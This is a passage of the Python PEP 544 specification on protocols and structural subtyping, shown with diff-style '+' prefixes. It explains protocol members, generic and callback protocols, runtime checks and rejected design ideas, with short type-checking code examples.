Apart from a few restrictions explicitly mentioned below, protocol types can +be used in every context where normal types can:

+
def close_all(things: Iterable[SupportsClose]) -> None:
+    for t in things:
+        t.close()
+
+f = open('foo.txt')
+r = Resource()
+close_all([f, r])  # OK!
+close_all([1])     # Error: 'int' has no 'close' method
+
+
+

Note that both the user-defined class Resource and the built-in +IO type (the return type of open()) are considered subtypes of +SupportsClose, because they provide a close() method with +a compatible type signature.

+
+
+

Protocol members

+

All methods defined in the protocol class body are protocol members, both +normal and decorated with @abstractmethod. If any parameters of a +protocol method are not annotated, then their types are assumed to be Any +(see PEP 484). Bodies of protocol methods are type checked. +An abstract method that should not be called via super() ought to raise +NotImplementedError. Example:

+
from typing import Protocol
+from abc import abstractmethod
+
+class Example(Protocol):
+    def first(self) -> int:     # This is a protocol member
+        return 42
+
+    @abstractmethod
+    def second(self) -> int:    # Method without a default implementation
+        raise NotImplementedError
+
+
+

Static methods, class methods, and properties are equally allowed +in protocols.

+

To define a protocol variable, one can use PEP 526 variable +annotations in the class body. Additional attributes only defined in +the body of a method by assignment via self are not allowed. The rationale +for this is that the protocol class implementation is often not shared by +subtypes, so the interface should not depend on the default implementation. +Examples:

+
from typing import Protocol, List
+
+class Template(Protocol):
+    name: str        # This is a protocol member
+    value: int = 0   # This one too (with default)
+
+    def method(self) -> None:
+        self.temp: List[int] = [] # Error in type checker
+
+class Concrete:
+    def __init__(self, name: str, value: int) -> None:
+        self.name = name
+        self.value = value
+
+    def method(self) -> None:
+        return
+
+var: Template = Concrete('value', 42)  # OK
+
+
+

To distinguish between protocol class variables and protocol instance +variables, the special ClassVar annotation should be used as specified +by PEP 526. By default, protocol variables as defined above are considered +readable and writable. To define a read-only protocol variable, one can use +an (abstract) property.

+
+
+

Explicitly declaring implementation

+

To explicitly declare that a certain class implements a given protocol, +it can be used as a regular base class. In this case a class could use +default implementations of protocol members. Static analysis tools are +expected to automatically detect that a class implements a given protocol. +So while it’s possible to subclass a protocol explicitly, it’s not necessary +to do so for the sake of type-checking.

+

The default implementations cannot be used if +the subtype relationship is implicit and only via structural +subtyping – the semantics of inheritance is not changed. Examples:

+
class PColor(Protocol):
+    @abstractmethod
+    def draw(self) -> str:
+        ...
+    def complex_method(self) -> int:
+        # some complex code here
+        ...
+
+class NiceColor(PColor):
+    def draw(self) -> str:
+        return "deep blue"
+
+class BadColor(PColor):
+    def draw(self) -> str:
+        return super().draw()  # Error, no default implementation
+
+class ImplicitColor:   # Note no 'PColor' base here
+    def draw(self) -> str:
+        return "probably gray"
+    def complex_method(self) -> int:
+        # class needs to implement this
+        ...
+
+nice: NiceColor
+another: ImplicitColor
+
+def represent(c: PColor) -> None:
+    print(c.draw(), c.complex_method())
+
+represent(nice) # OK
+represent(another) # Also OK
+
+
+

Note that there is little difference between explicit and implicit +subtypes; the main benefit of explicit subclassing is to get some protocol +methods “for free”. In addition, type checkers can statically verify that +the class actually implements the protocol correctly:

+
class RGB(Protocol):
+    rgb: Tuple[int, int, int]
+
+    @abstractmethod
+    def intensity(self) -> int:
+        return 0
+
+class Point(RGB):
+    def __init__(self, red: int, green: int, blue: str) -> None:
+        self.rgb = red, green, blue  # Error, 'blue' must be 'int'
+
+    # Type checker might warn that 'intensity' is not defined
+
+
+

A class can explicitly inherit from multiple protocols and also from normal +classes. In this case methods are resolved using the normal MRO and a type checker +verifies that all subtyping relationships are correct. The semantics of @abstractmethod +is not changed; all abstract methods must be implemented by an explicit subclass +before it can be instantiated.

+
+
+

Merging and extending protocols

+

The general philosophy is that protocols are mostly like regular ABCs, +but a static type checker will handle them specially. Subclassing a protocol +class would not turn the subclass into a protocol unless it also has +typing.Protocol as an explicit base class. Without this base, the class +is “downgraded” to a regular ABC that cannot be used with structural +subtyping. The rationale for this rule is that we don’t want to accidentally +have some class act as a protocol just because one of its base classes +happens to be one. We still slightly prefer nominal subtyping over structural +subtyping in the static typing world.

+

A subprotocol can be defined by having both one or more protocols as +immediate base classes and also having typing.Protocol as an immediate +base class:

+
from typing import Sized, Protocol
+
+class SizedAndClosable(Sized, Protocol):
+    def close(self) -> None:
+        ...
+
+
+

Now the protocol SizedAndClosable is a protocol with two methods, +__len__ and close. If one omits Protocol in the base class list, +this would be a regular (non-protocol) class that must implement Sized. +Alternatively, one can implement SizedAndClosable protocol by merging +the SupportsClose protocol from the example in the definition section +with typing.Sized:

+
from typing import Sized
+
+class SupportsClose(Protocol):
+    def close(self) -> None:
+        ...
+
+class SizedAndClosable(Sized, SupportsClose, Protocol):
+    pass
+
+
+

The two definitions of SizedAndClosable are equivalent. +Subclass relationships between protocols are not meaningful when +considering subtyping, since structural compatibility is +the criterion, not the MRO.

+

If Protocol is included in the base class list, all the other base classes +must be protocols. A protocol can’t extend a regular class; see rejected ideas for the rationale. +Note that rules around explicit subclassing are different +from regular ABCs, where abstractness is simply defined by having at least one +abstract method unimplemented. Protocol classes must be marked +explicitly.

+
+
+

Generic protocols

+

Generic protocols are important. For example, SupportsAbs, Iterable +and Iterator are generic protocols. They are defined similarly to normal +non-protocol generic types:

+
class Iterable(Protocol[T]):
+    @abstractmethod
+    def __iter__(self) -> Iterator[T]:
+        ...
+
+
+

Protocol[T, S, ...] is allowed as a shorthand for +Protocol, Generic[T, S, ...].

+

User-defined generic protocols support explicitly declared variance. +Type checkers will warn if the inferred variance is different from +the declared variance. Examples:

+
T = TypeVar('T')
+T_co = TypeVar('T_co', covariant=True)
+T_contra = TypeVar('T_contra', contravariant=True)
+
+class Box(Protocol[T_co]):
+    def content(self) -> T_co:
+        ...
+
+box: Box[float]
+second_box: Box[int]
+box = second_box  # This is OK due to the covariance of 'Box'.
+
+class Sender(Protocol[T_contra]):
+    def send(self, data: T_contra) -> int:
+        ...
+
+sender: Sender[float]
+new_sender: Sender[int]
+new_sender = sender  # OK, 'Sender' is contravariant.
+
+class Proto(Protocol[T]):
+    attr: T  # this class is invariant, since it has a mutable attribute
+
+var: Proto[float]
+another_var: Proto[int]
+var = another_var  # Error! 'Proto[float]' is incompatible with 'Proto[int]'.
+
+
+

Note that unlike nominal classes, de facto covariant protocols cannot be +declared as invariant, since this can break transitivity of subtyping +(see rejected ideas for details). For example:

+
T = TypeVar('T')
+
+class AnotherBox(Protocol[T]):  # Error, this protocol is covariant in T,
+    def content(self) -> T:     # not invariant.
+        ...
+
+
+
+
+

Recursive protocols

+

Recursive protocols are also supported. Forward references to the protocol +class names can be given as strings as specified by PEP 484. Recursive +protocols are useful for representing self-referential data structures +like trees in an abstract fashion:

+
class Traversable(Protocol):
+    def leaves(self) -> Iterable['Traversable']:
+        ...
+
+
+

Note that for recursive protocols, a class is considered a subtype of +the protocol in situations where the decision depends on itself. +Continuing the previous example:

+
class SimpleTree:
+    def leaves(self) -> List['SimpleTree']:
+        ...
+
+root: Traversable = SimpleTree()  # OK
+
+class Tree(Generic[T]):
+    def leaves(self) -> List['Tree[T]']:
+        ...
+
+def walk(graph: Traversable) -> None:
+    ...
+tree: Tree[float] = Tree()
+walk(tree)  # OK, 'Tree[float]' is a subtype of 'Traversable'
+
+
+
+
+

Self-types in protocols

+

The self-types in protocols follow the +corresponding specification +of PEP 484. For example:

+
C = TypeVar('C', bound='Copyable')
+class Copyable(Protocol):
+    def copy(self: C) -> C:
+        ...
+
+class One:
+    def copy(self) -> 'One':
+        ...
+
+T = TypeVar('T', bound='Other')
+class Other:
+    def copy(self: T) -> T:
+        ...
+
+c: Copyable
+c = One()  # OK
+c = Other()  # Also OK
+
+
+
+
+

Callback protocols

+

Protocols can be used to define flexible callback types that are hard +(or even impossible) to express using the Callable[...] syntax +specified by PEP 484, such as variadic, overloaded, and complex generic +callbacks. They can be defined as protocols with a __call__ member:

+
from typing import Optional, List, Protocol
+
+class Combiner(Protocol):
+    def __call__(self, *vals: bytes,
+                 maxlen: Optional[int] = None) -> List[bytes]: ...
+
+def good_cb(*vals: bytes, maxlen: Optional[int] = None) -> List[bytes]:
+    ...
+def bad_cb(*vals: bytes, maxitems: Optional[int]) -> List[bytes]:
+    ...
+
+comb: Combiner = good_cb  # OK
+comb = bad_cb  # Error! Argument 2 has incompatible type because of
+               # different name and kind in the callback
+
+
+

Callback protocols and Callable[...] types can be used interchangeably.

+
+
+
+

Using Protocols

+
+

Subtyping relationships with other types

+

Protocols cannot be instantiated, so there are no values whose +runtime type is a protocol. For variables and parameters with protocol types, +subtyping relationships are subject to the following rules:

+
    +
  • A protocol is never a subtype of a concrete type.
  • +
  • A concrete type X is a subtype of protocol P +if and only if X implements all protocol members of P with +compatible types. In other words, subtyping with respect to a protocol is +always structural.
  • +
  • A protocol P1 is a subtype of another protocol P2 if P1 defines +all protocol members of P2 with compatible types (see the sketch after this +list).
  • +
+
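
The third rule, in particular, requires no inheritance relationship between the two protocols; structural compatibility alone suffices. A sketch with invented names:

+
from typing import Protocol

+class HasClose(Protocol):
+    def close(self) -> None: ...
+
+class HasCloseAndFlush(Protocol):
+    def close(self) -> None: ...
+    def flush(self) -> None: ...
+
+def shutdown(resource: HasClose) -> None:
+    resource.close()
+
+def finish(stream: HasCloseAndFlush) -> None:
+    stream.flush()
+    shutdown(stream)  # OK: HasCloseAndFlush defines all members of HasClose
+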

Generic protocol types follow the same rules of variance as non-protocol +types. Protocol types can be used in all contexts where any other types +can be used, such as in Union, ClassVar, type variables bounds, etc. +Generic protocols follow the rules for generic abstract classes, except for +using structural compatibility instead of compatibility defined by +inheritance relationships.

+

Static type checkers will recognize protocol implementations, even if the +corresponding protocols are not imported:

+
# file lib.py
+from typing import Sized
+
+T = TypeVar('T', contravariant=True)
+class ListLike(Sized, Protocol[T]):
+    def append(self, x: T) -> None:
+        pass
+
+def populate(lst: ListLike[int]) -> None:
+    ...
+
+# file main.py
+from lib import populate  # Note that ListLike is NOT imported
+
+class MockStack:
+    def __len__(self) -> int:
+        return 42
+    def append(self, x: int) -> None:
+        print(x)
+
+populate([1, 2, 3])    # Passes type check
+populate(MockStack())  # Also OK
+
+
+
+
+

Unions and intersections of protocols

+

A union of protocol classes behaves the same way as a union of non-protocol +classes. For example:

+
from typing import Union, Optional, Protocol
+
+class Exitable(Protocol):
+    def exit(self) -> int:
+        ...
+class Quittable(Protocol):
+    def quit(self) -> Optional[int]:
+        ...
+
+def finish(task: Union[Exitable, Quittable]) -> int:
+    ...
+class DefaultJob:
+    ...
+    def quit(self) -> int:
+        return 0
+finish(DefaultJob()) # OK
+
+
+

One can use multiple inheritance to define an intersection of protocols. +Example:

+
from typing import Iterable, Hashable
+
+class HashableFloats(Iterable[float], Hashable, Protocol):
+    pass
+
+def cached_func(args: HashableFloats) -> float:
+    ...
+cached_func((1, 2, 3)) # OK, tuple is both hashable and iterable
+
+
+

If this proves to be a widely used scenario, then a special +intersection type construct could be added in the future as specified by PEP 483; +see rejected ideas for more details.

+
+
+

Type[] and class objects vs protocols

+

Variables and parameters annotated with Type[Proto] accept only concrete +(non-protocol) subtypes of Proto. The main reason for this is to allow +instantiation of parameters with such type. For example:

+
class Proto(Protocol):
+    @abstractmethod
+    def meth(self) -> int:
+        ...
+class Concrete:
+    def meth(self) -> int:
+        return 42
+
+def fun(cls: Type[Proto]) -> int:
+    return cls().meth() # OK
+fun(Proto)              # Error
+fun(Concrete)           # OK
+
+
+

The same rule applies to variables:

+
var: Type[Proto]
+var = Proto    # Error
+var = Concrete # OK
+var().meth()   # OK
+
+
+

Assigning an ABC or a protocol class to a variable is allowed if it is +not explicitly typed, and such assignment creates a type alias. +For normal (non-abstract) classes, the behavior of Type[] is +not changed.

+

A class object is considered an implementation of a protocol if accessing +all members on it results in types compatible with the protocol members. +For example:

+
from typing import Any, Protocol
+
+class ProtoA(Protocol):
+    def meth(self, x: int) -> int: ...
+class ProtoB(Protocol):
+    def meth(self, obj: Any, x: int) -> int: ...
+
+class C:
+    def meth(self, x: int) -> int: ...
+
+a: ProtoA = C  # Type check error, signatures don't match!
+b: ProtoB = C  # OK
+
+
+
+
+

NewType() and type aliases

+

Protocols are essentially anonymous. To emphasize this point, static type +checkers might refuse protocol classes inside NewType() to avoid an +illusion that a distinct type is provided:

+
from typing import NewType, Protocol, Iterator
+
+class Id(Protocol):
+    code: int
+    secrets: Iterator[bytes]
+
+UserId = NewType('UserId', Id)  # Error, can't provide distinct type
+
+
+

In contrast, type aliases are fully supported, including generic type +aliases:

+
from typing import TypeVar, Reversible, Iterable, Sized
+
+T = TypeVar('T')
+class SizedIterable(Iterable[T], Sized, Protocol):
+    pass
+CompatReversible = Union[Reversible[T], SizedIterable[T]]
+
+
+
+
+

Modules as implementations of protocols

+

A module object is accepted where a protocol is expected if the public +interface of the given module is compatible with the expected protocol. +For example:

+
# file default_config.py
+timeout = 100
+one_flag = True
+other_flag = False
+
+# file main.py
+import default_config
+from typing import Protocol
+
+class Options(Protocol):
+    timeout: int
+    one_flag: bool
+    other_flag: bool
+
+def setup(options: Options) -> None:
+    ...
+
+setup(default_config)  # OK
+
+
+

To determine compatibility of module level functions, the self argument +of the corresponding protocol methods is dropped. For example:

+
# callbacks.py
+def on_error(x: int) -> None:
+    ...
+def on_success() -> None:
+    ...
+
+# main.py
+import callbacks
+from typing import Protocol
+
+class Reporter(Protocol):
+    def on_error(self, x: int) -> None:
+        ...
+    def on_success(self) -> None:
+        ...
+
+rp: Reporter = callbacks  # Passes type check
+
+
+
+
+

@runtime_checkable decorator and narrowing types by isinstance()

+

The default semantics is that isinstance() and issubclass() fail +for protocol types. This is in the spirit of duck typing – protocols +basically would be used to model duck typing statically, not explicitly +at runtime.

+

However, it should be possible for protocol types to implement custom +instance and class checks when this makes sense, similar to how Iterable +and other ABCs in collections.abc and typing already do it, +but this is limited to non-generic and unsubscripted generic protocols +(Iterable is statically equivalent to Iterable[Any]). +The typing module will define a special @runtime_checkable class decorator +that provides the same semantics for class and instance checks as for +collections.abc classes, essentially making them “runtime protocols”:

+
from typing import runtime_checkable, Protocol
+
+@runtime_checkable
+class SupportsClose(Protocol):
+    def close(self):
+        ...
+
+assert isinstance(open('some/file'), SupportsClose)
+
+
+

Note that instance checks are not 100% reliable statically; this is why +this behavior is opt-in (see the section on rejected +ideas for examples). +The most type checkers can do is to treat isinstance(obj, Iterator) +roughly as a simpler way to write +hasattr(obj, '__iter__') and hasattr(obj, '__next__'). To minimize +the risks for this feature, the following rules are applied.

+

Definitions:

+
    +
  • Data and non-data protocols: A protocol is called a non-data protocol +if it contains only methods as members (for example Sized, +Iterator, etc). A protocol that contains at least one non-method member +(like x: int) is called a data protocol.
  • +
  • Unsafe overlap: A type X is called unsafely overlapping with +a protocol P, if X is not a subtype of P, but it is a subtype +of the type-erased version of P where all members have type Any. +In addition, if at least one element of a union unsafely overlaps with +a protocol P, then the whole union is unsafely overlapping with P. +(See the sketch after these definitions.)
  • +
+
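
A sketch of an unsafe overlap (invented names; uses the @runtime_checkable decorator described above):

+
from typing import Protocol, runtime_checkable

+@runtime_checkable
+class P(Protocol):
+    def meth(self) -> int: ...
+
+class C:
+    def meth(self) -> str:  # incompatible return type: C does not implement P
+        return 'no'
+
+# C is a subtype of the type-erased version of P (it has a 'meth' member),
+# so C unsafely overlaps with P: the runtime check succeeds anyway.
+assert isinstance(C(), P)
+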

Specification:

+
    +
  • A protocol can be used as a second argument in isinstance() and +issubclass() only if it is explicitly opted in via the @runtime_checkable +decorator. This requirement exists because protocol checks are not type safe +in case of dynamically set attributes, and because type checkers can prove +that an isinstance() check is safe only for a given class, not for all its +subclasses.
  • +
  • isinstance() can be used with both data and non-data protocols, while +issubclass() can be used only with non-data protocols. This restriction +exists because some data attributes can be set on an instance in the constructor +and this information is not always available on the class object.
  • +
  • Type checkers should reject an isinstance() or issubclass() call, if +there is an unsafe overlap between the type of the first argument and +the protocol.
  • +
  • Type checkers should be able to select a correct element from a union after +a safe isinstance() or issubclass() call. For narrowing from non-union +types, type checkers can use their best judgement (this is intentionally +unspecified, since a precise specification would require intersection types).
  • +
+
+
+
+

Using Protocols in Python 2.7 - 3.5

+

Variable annotation syntax was added in Python 3.6, so the syntax +for defining protocol variables proposed in the specification section can’t +be used if support for earlier versions is needed. To define these +in a manner compatible with older versions of Python one can use properties. +Properties can be settable and/or abstract if needed:

+
class Foo(Protocol):
+    @property
+    def c(self) -> int:
+        return 42         # Default value can be provided for property...
+
+    @abstractproperty
+    def d(self) -> int:   # ... or it can be abstract
+        return 0
+
+
+

Also function type comments can be used as per PEP 484 (for example +to provide compatibility with Python 2). The typing module changes +proposed in this PEP will also be backported to earlier versions via the +backport currently available on PyPI.

+
+
+

Runtime Implementation of Protocol Classes

+
+

Implementation details

+

The runtime implementation could be done in pure Python without any +effects on the core interpreter and standard library except in the +typing module, and a minor update to collections.abc:

+
    +
  • Define class typing.Protocol similar to typing.Generic.
  • +
  • Implement functionality to detect whether a class is +a protocol or not. Add a class attribute _is_protocol = True +if that is the case. Verify that a protocol class only has protocol +base classes in the MRO (except for object).
  • +
  • Implement @runtime_checkable that allows __subclasshook__() +to perform structural instance and subclass checks as in collections.abc +classes.
  • +
  • All structural subtyping checks will be performed by static type checkers, +such as mypy [mypy]. No additional support for protocol validation will +be provided at runtime.
  • +
+
+
+

Changes in the typing module

+

The following classes in the typing module will be protocols:

+
    +
  • Callable
  • +
  • Awaitable
  • +
  • Iterable, Iterator
  • +
  • AsyncIterable, AsyncIterator
  • +
  • Hashable
  • +
  • Sized
  • +
  • Container
  • +
  • Collection
  • +
  • Reversible
  • +
  • ContextManager, AsyncContextManager
  • +
  • SupportsAbs (and other Supports* classes)
  • +
+

Most of these classes are small and conceptually simple. It is easy to see +what methods these protocols implement, and to immediately recognize +the corresponding runtime protocol counterpart. +Practically, few changes will be needed in typing, since some of these +classes already behave the necessary way at runtime. Most of these will need +to be updated only in the corresponding typeshed stubs [typeshed].

+

All other concrete generic classes such as List, Set, IO, +Deque, etc are sufficiently complex that it makes sense to keep +them non-protocols (i.e. require code to be explicit about them). Also, it is +too easy to leave some methods unimplemented by accident, and explicitly +marking the subclass relationship allows type checkers to pinpoint the missing +implementations.

+
+
+

Introspection

+

The existing class introspection machinery (dir, __annotations__ etc) +can be used with protocols. In addition, all introspection tools implemented +in the typing module will support protocols. Since all attributes need +to be defined in the class body based on this proposal, protocol classes will +have an even better perspective for introspection than regular classes, where +attributes can be defined implicitly – protocol attributes can’t be +initialized in ways that are not visible to introspection +(using setattr(), assignment via self, etc.). Still, some things like +types of attributes will not be visible at runtime in Python 3.5 and earlier, +but this looks like a reasonable limitation.

+

There will be only limited support of isinstance() and issubclass() +as discussed above (these will always fail with TypeError for +subscripted generic protocols, since a reliable answer could not be given +at runtime in this case). But together with other introspection tools this +gives a reasonable perspective for runtime type checking tools.

+
+
+
+

Rejected/Postponed Ideas

+

The ideas in this section were previously discussed in [several] +[discussions] [elsewhere].

+
+

Make every class a protocol by default

+

Some languages such as Go make structural subtyping the only or the primary +form of subtyping. We could achieve a similar result by making all classes +protocols by default (or even always). However, we believe that it is better +to require classes to be explicitly marked as protocols, for the following +reasons:

+
    +
  • Protocols don’t have some properties of regular classes. In particular, +isinstance(), as defined for normal classes, is based on the nominal +hierarchy. In order to make everything a protocol by default, and have +isinstance() work would require changing its semantics, +which won’t happen.
  • +
  • Protocol classes should generally not have many method implementations, +as they describe an interface, not an implementation. +Most classes have many method implementations, making them bad protocol +classes.
  • +
  • Experience suggests that many classes are not practical as protocols anyway, +mainly because their interfaces are too large, complex or +implementation-oriented (for example, they may include de facto +private attributes and methods without a __ prefix).
  • +
  • Most actually useful protocols in existing Python code seem to be implicit. +The ABCs in typing and collections.abc are rather an exception, but +even they are recent additions to Python and most programmers +do not use them yet.
  • +
  • Many built-in functions only accept concrete instances of int +(and subclass instances), and similarly for other built-in classes. Making +int a structural type wouldn’t be safe without major changes to the +Python runtime, which won’t happen.
  • +
+
+
+

Protocols subclassing normal classes

+

The main rationale to prohibit this is to preserve transitivity of subtyping; +consider this example:

+
from typing import Protocol
+
+class Base:
+    attr: str
+
+class Proto(Base, Protocol):
+    def meth(self) -> int:
+        ...
+
+class C:
+    attr: str
+    def meth(self) -> int:
+        return 0
+
+
+

Now, C is a subtype of Proto, and Proto is a subtype of Base. +But C cannot be a subtype of Base (since the latter is not +a protocol). This situation would be really weird. In addition, there is +an ambiguity about whether attributes of Base should become protocol +members of Proto.

+
+
+

Support optional protocol members

+

We can come up with examples where it would be handy to be able to say +that a method or data attribute does not need to be present in a class +implementing a protocol, but if it is present, it must conform to a specific +signature or type. One could use a hasattr() check to determine whether +they can use the attribute on a particular instance.

+

Languages such as TypeScript have similar features and +apparently they are pretty commonly used. The current realistic potential +use cases for protocols in Python don’t require these. In the interest +of simplicity, we propose to not support optional methods or attributes. +We can always revisit this later if there is an actual need.

+
+
+

Allow only protocol methods and force use of getters and setters

+

One could argue that protocols typically only define methods, but not +variables. However, using getters and setters in cases where only a +simple variable is needed would be quite unpythonic. Moreover, the widespread +use of properties (that often act as type validators) in large code bases +is partially due to the previous absence of static type checkers for Python, +the problem that PEP 484 and this PEP are aiming to solve. For example:

+
# without static types
+
+class MyClass:
+    @property
+    def my_attr(self):
+        return self._my_attr
+    @my_attr.setter
+    def my_attr(self, value):
+        if not isinstance(value, int):
+            raise ValidationError("An integer expected for my_attr")
+        self._my_attr = value
+
+# with static types
+
+class MyClass:
+    my_attr: int
+
+
+
+
+

Support non-protocol members

+

There was an idea to make some methods “non-protocol” (i.e. not necessary +to implement, and inherited in explicit subclassing), but it was rejected, +since this complicates things. For example, consider this situation:

+
class Proto(Protocol):
+    @abstractmethod
+    def first(self) -> int:
+        raise NotImplementedError
+    def second(self) -> int:
+        return self.first() + 1
+
+def fun(arg: Proto) -> None:
+    arg.second()
+
+
+

The question is: should this be an error? We think most people would expect +this to be valid. Therefore, to be on the safe side, we need to require both +methods to be implemented in implicit subclasses. In addition, if one looks +at definitions in collections.abc, there are very few methods that could +be considered “non-protocol”. Therefore, it was decided to not introduce +“non-protocol” methods.

+

There is only one downside to this: it will require some boilerplate for +implicit subtypes of “large” protocols. But this doesn’t apply to “built-in” +protocols, which are all “small” (i.e. have only a few abstract methods). +Also, such style is discouraged for user-defined protocols. It is recommended +to create compact protocols and combine them.

+
+
+

Make protocols interoperable with other approaches

+

The protocols as described here are basically a minimal extension to +the existing concept of ABCs. We argue that this is the way they should +be understood, instead of as something that replaces Zope interfaces, +for example. Attempting such interoperability would significantly +complicate both the concept and the implementation.

+

On the other hand, Zope interfaces are conceptually a superset of protocols +defined here, but using an incompatible syntax to define them, +because before PEP 526 there was no straightforward way to annotate attributes. +In the 3.6+ world, zope.interface might potentially adopt the Protocol +syntax. In this case, type checkers could be taught to recognize interfaces +as protocols and make simple structural checks with respect to them.

+
+
+

Use assignments to check explicitly that a class implements a protocol

+

In the Go language the explicit checks for implementation are performed +via dummy assignments [golang]. Such an approach is also possible with the +current proposal. Example:

+
class A:
+    def __len__(self) -> float:
+        return ...
+
+_: Sized = A()  # Error: A.__len__ doesn't conform to 'Sized'
+                # (Incompatible return type 'float')
+
+
+

This approach moves the check away from +the class definition and it almost requires a comment as otherwise +the code probably would not make any sense to an average reader +– it looks like dead code. Besides, in the simplest form it requires one +to construct an instance of A, which could be problematic if this requires +accessing or allocating some resources such as files or sockets. +We could work around the latter by using a cast, for example, but then +the code would be ugly. Therefore, we discourage the use of this pattern.

+
+
+

Support isinstance() checks by default

+

The problem with this is that instance checks could be unreliable, except for
+situations where there is a common signature convention such as Iterable.
+For example:

+
class P(Protocol):
+    def common_method_name(self, x: int) -> int: ...
+
+class X:
+    <a bunch of methods>
+    def common_method_name(self) -> None: ... # Note different signature
+
+def do_stuff(o: Union[P, X]) -> int:
+    if isinstance(o, P):
+        return o.common_method_name(1)  # Results in TypeError not caught
+                                        # statically if o is an X instance.
+
+
+

Another potentially problematic case is assignment of attributes +after instantiation:

+
class P(Protocol):
+    x: int
+
+class C:
+    def initialize(self) -> None:
+        self.x = 0
+
+c = C()
+isinstance(c, P)  # False
+c.initialize()
+isinstance(c, P)  # True
+
+def f(x: Union[P, int]) -> None:
+    if isinstance(x, P):
+        # Static type of x is P here.
+        ...
+    else:
+        # Static type of x is int, but can be other type at runtime...
+        print(x + 1)
+
+f(C())  # ...causing a TypeError.
+
+
+

We argue that requiring an explicit class decorator would be better, since
+one can then attach warnings about problems like this in the documentation.
+The user would be able to evaluate whether the benefits outweigh
+the potential for confusion for each protocol and explicitly opt in – but
+the default behavior would be safer. Finally, it will be easy to make this
+behavior the default if necessary, while it might be problematic to make it
+opt-in after it has been the default.
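With the accepted design, the opt-in looks like the sketch below, using the
+runtime_checkable decorator (available in typing since Python 3.8 and in
+typing_extensions before that):
+
from typing import Protocol, runtime_checkable
+
+@runtime_checkable
+class Closable(Protocol):
+    def close(self) -> None: ...
+
+class Resource:
+    def close(self) -> None:
+        pass
+
+# isinstance() works only because the protocol explicitly opted in.
+assert isinstance(Resource(), Closable)
+assert not isinstance(object(), Closable)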

+
+
+

Provide a special intersection type construct

+

There was an idea to allow Proto = All[Proto1, Proto2, ...] as a shorthand +for:

+
class Proto(Proto1, Proto2, ..., Protocol):
+    pass
+
+
+

However, it is not yet clear how popular or useful this will be, and
+implementing it in type checkers for non-protocol classes could be difficult.
+Finally, it will be very easy to add this later if needed.

+
+
+

Prohibit explicit subclassing of protocols by non-protocols

+

This was rejected for the following reasons:

+
    +
  • Backward compatibility: People are already using ABCs, including generic
+ABCs from the typing module. If we prohibit explicit subclassing of these
+ABCs, then quite a lot of code will break.
  • +
  • Convenience: There are existing protocol-like ABCs (that may be turned +into protocols) that have many useful “mix-in” (non-abstract) methods. +For example, in the case of Sequence one only needs to implement +__getitem__ and __len__ in an explicit subclass, and one gets +__iter__, __contains__, __reversed__, index, and count +for free.
  • +
  • Explicit subclassing makes it explicit that a class implements a particular +protocol, making subtyping relationships easier to see.
  • +
  • Type checkers can warn about missing protocol members or members with +incompatible types more easily, without having to use hacks like dummy +assignments discussed above in this section.
  • +
  • Explicit subclassing makes it possible to force a class to be considered +a subtype of a protocol (by using # type: ignore together with an +explicit base class) when it is not strictly compatible, such as when +it has an unsafe override.
  • +
+
+
+

Covariant subtyping of mutable attributes

+

Rejected because covariant subtyping of mutable attributes is not safe. +Consider this example:

+
class P(Protocol):
+    x: float
+
+def f(arg: P) -> None:
+    arg.x = 0.42
+
+class C:
+    x: int
+
+c = C()
+f(c)  # Would typecheck if covariant subtyping
+      # of mutable attributes were allowed.
+c.x >> 1  # But this fails at runtime
+
+
+

It was initially proposed to allow this for practical reasons, but it was
+subsequently rejected, since this may mask some hard-to-spot bugs.
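For contrast, a minimal sketch of the safe alternative: declaring the member
+read-only (as a property) removes the ability to write through the protocol,
+so covariance becomes sound and an int attribute can match a float member:
+
from typing import Protocol
+
+class P(Protocol):
+    @property
+    def x(self) -> float: ...  # read-only member
+
+class C:
+    x: int = 1
+
+def f(arg: P) -> None:
+    print(arg.x + 0.5)  # only reads x; cannot assign through P
+
+f(C())  # OK: reading an int where a float is expected is safe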

+
+
+

Overriding inferred variance of protocol classes

+

It was proposed to allow declaring protocols as invariant if they are actually
+covariant or contravariant (as is possible for nominal classes, see PEP 484).
+However, it was decided not to do this because of several downsides:

+
    +
  • Declared protocol invariance breaks transitivity of subtyping. Consider
+this situation:
    T = TypeVar('T')
    +
    +class P(Protocol[T]):  # Protocol is declared as invariant.
    +    def meth(self) -> T:
    +        ...
    +class C:
    +    def meth(self) -> float:
    +        ...
    +class D(C):
    +    def meth(self) -> int:
    +        ...
    +
    +
    +

    Now we have that D is a subtype of C, and C is a subtype of
+P[float]. But D is not a subtype of P[float], since D
+implements P[int] and P is invariant. There is a possibility
+to “cure” this by looking for protocol implementations in MROs, but this
+would be too complex in the general case, and this “cure” would require
+abandoning the simple idea of purely structural subtyping for protocols.

    +
  • +
  • Subtyping checks will always require type inference for protocols. In the +above example a user may complain: “Why did you infer P[int] for +my D? It implements P[float]!”. Normally, inference can be overruled +by an explicit annotation, but here this will require explicit subclassing, +defeating the purpose of using protocols.
  • +
  • Allowing variance to be overridden would make it impossible for type
+checkers to give more detailed error messages citing particular conflicts
+in member type signatures.
  • +
  • Finally, explicit is better than implicit in this case. Requiring the user to
+declare the correct variance will make the code easier to understand and will
+avoid unexpected errors at the point of use.
  • +
+
+
+

Support adapters and adaptation

+

Adaptation was proposed by PEP 246 (rejected) and is supported by
+zope.interface; see the Zope documentation on adapter registries.
+Adaptation is quite an advanced concept, and PEP 484 supports unions and
+generic aliases that can be used instead of adapters. This can be illustrated
+with the Iterable protocol: there is another way of supporting
+iteration, by providing __getitem__ and __len__. If a function
+supports both this way and the now-standard __iter__ method, then its
+argument could be annotated with a union type:

+
class OldIterable(Sized, Protocol[T]):
+    def __getitem__(self, item: int) -> T: ...
+
+CompatIterable = Union[Iterable[T], OldIterable[T]]
+
+class A:
+    def __iter__(self) -> Iterator[str]: ...
+class B:
+    def __len__(self) -> int: ...
+    def __getitem__(self, item: int) -> str: ...
+
+def iterate(it: CompatIterable[str]) -> None:
+    ...
+
+iterate(A())  # OK
+iterate(B())  # OK
+
+
+

Since there is a reasonable alternative for such cases with existing tooling,
+adaptation is not included in this PEP.

+
+
+

Call structural base types “interfaces”

+

“Protocol” is a term already widely used in Python to describe duck typing
+contracts such as the iterator protocol (providing __iter__
+and __next__) and the descriptor protocol (providing __get__,
+__set__, and __delete__). In addition to this and other reasons given
+in the specification, protocols are different from Java interfaces in several
+aspects: protocols don’t require an explicit declaration of implementation
+(they are mainly oriented towards duck typing), protocols can have
+default implementations of members, and protocols can store state.

+
+
+

Make protocols special objects at runtime rather than normal ABCs

+

Making protocols non-ABCs would make backwards compatibility problematic,
+if possible at all. For example, collections.abc.Iterable is already
+an ABC, and lots of existing code uses patterns like
